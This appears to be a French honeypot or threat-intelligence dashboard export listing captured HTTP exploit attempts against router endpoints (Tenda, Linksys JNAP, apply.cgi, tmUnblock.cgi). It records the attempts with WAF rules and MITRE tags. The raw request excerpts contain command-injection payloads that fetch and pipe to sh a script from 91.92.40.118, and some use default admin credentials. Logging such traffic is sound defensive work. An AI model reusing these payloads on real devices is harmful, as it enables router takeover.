POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json X-JNAP-ACTION: http://linksys.com/jnap/wpsstationinfo/GetStationInfo Content-Length: 205 Connection: close device_name=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7C |
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20t…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge
Requête brute (extrait)
GET /goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda HTTP/1.1 Host: 6 |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /storage/apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /storage/apply.cgi
Émulateur
HTTP
WAF
40
Recommandation
Investiguer
Tags
Cible HTTP
POST
/storage/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/storage/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /storage/apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-
Requête brute (extrait)
POST /storage/apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 230 Connection: close next_page=/tmp/.s&submit_button=;cd%20/tmp%3Bwget%20http://91.92.40.1 |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-url
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 255 Connection: close action=Apply&change_action=gozila_cgi&submit_type=&pptp_ip=cd%20/tmp%3Bwget%2 |
|||||||
| TCP | 8081 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 80 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 80
Confiance : Confiance 95 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 243 Connectio
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 243 Connection: close wl_ssid=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http://91.92.40. |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jn
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/setup/SetupWizard Content-Length: 236 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/setup/SetupWizard","c
|
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
72
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-2
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jn
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/network/Diagnostics Content-Length: 269 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/network/Diagnostics
|
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-url
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 350 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&act |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-url
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 334 Connection: close change_action=&submit_button=Basic&action=&commit=0&wan_ip=10.0.0.1&wan_mask= |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-url
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 352 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_tracerou |
|||||||
| TCP | 8081 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8081 · (tentative d'exploit) · → /hndUnblock.cgi | Élevée | Élevé · 80 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /hndUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/hndUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/hndUnblock.cgi
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 80
Confiance : Confiance 95 % — Motif catalogue confirmé · 6 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /hndUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 299 Conn
Requête brute (extrait)
POST /hndUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 299 Connection: close ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhablk%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhab…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /hndUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h
Requête brute (extrait)
GET /hndUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhablk%60 HTTP/1.1 Host: 6 |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20l…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /tmUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt
Requête brute (extrait)
GET /tmUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%60 HTTP/1.1 Host: 62.3. |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /tmUnblock.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /tmUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/tmUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/tmUnblock.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 242 Conne
Requête brute (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 242 Connection: close ttcp_num=3&ttcp_size=3&ttcp_ip=-h+%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lunblkv%3B |
|||||||
| TCP | 8081 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8081 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /
Émulateur
HTTP
WAF
3
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag sap-sapcontrol-path) · confiance 80%
Confiance classification
80%
Risque capteur
Moyen
· 40
Confiance : Confiance 80 % — Score WAF 20 · 1 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /tmUnblock.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /tmUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/tmUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/tmUnblock.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 294 Conne
Requête brute (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 294 Connection: close submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60cd%20/tmp%3Bwget%20http://91 |
|||||||